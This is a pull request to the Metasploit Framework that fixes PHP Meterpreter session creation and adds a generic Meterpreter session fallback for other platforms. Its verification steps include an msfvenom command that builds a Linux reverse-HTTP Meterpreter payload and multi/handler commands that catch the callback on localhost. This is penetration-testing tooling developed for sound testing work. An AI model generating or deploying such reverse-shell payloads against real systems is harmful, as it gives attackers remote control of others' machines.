### PR TITLE
Expand multi-handler for generic http(s) sessions

### DIFF
--- a/lib/msf/base/sessions/meterpreter_multi.rb
+++ b/lib/msf/base/sessions/meterpreter_multi.rb
@@ -31,7 +31,7 @@ class Meterpreter_Multi < Msf::Sessions::Meterpreter
       return Msf::Sessions::Meterpreter_Java_Android.new(rstream, opts)
     when 'php'
       require 'msf/base/sessions/meterpreter_php'
-      return Msf::Sessions::Meterpreter_Php_Java.new(rstream, opts)
+      return Msf::Sessions::Meterpreter_Php_Php.new(rstream, opts)
     when 'windows'
       if opts[:payload_uuid].arch == ARCH_X86
         require 'msf/base/sessions/meterpreter_x86_win'
@@ -42,6 +42,8 @@ class Meterpreter_Multi < Msf::Sessions::Meterpreter
     end
 
     # TODO: what should we do when we get here?
+    # For now lets return a generic for basic functionality with http(s) communication
+    Msf::Sessions::Meterpreter.new(rstream, opts)
   end
 end
 


### PR DESCRIPTION
Expand the multi handler support for generic platforms.

Also corrects PHP session creations.

## Verification

List the steps needed to make sure this thing works

- [x] Create and start a payload for a previously unsupported arch/platform (i.e. x86/linux)
`msfvenom -p linux/x86/meterpreter_reverse_http LHOST=127.0.0.1 LPORT=5000 -f elf -o shell_direct.elf`
- [x] Start the payload `msfconsole`
- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set payload multi/meterpreter/reverse_http`
- [x] `set LHOST 127.0.0.1`
- [x] `set LPORT 5000`
- [x] **Verify** a session is successfully created and interacts with console

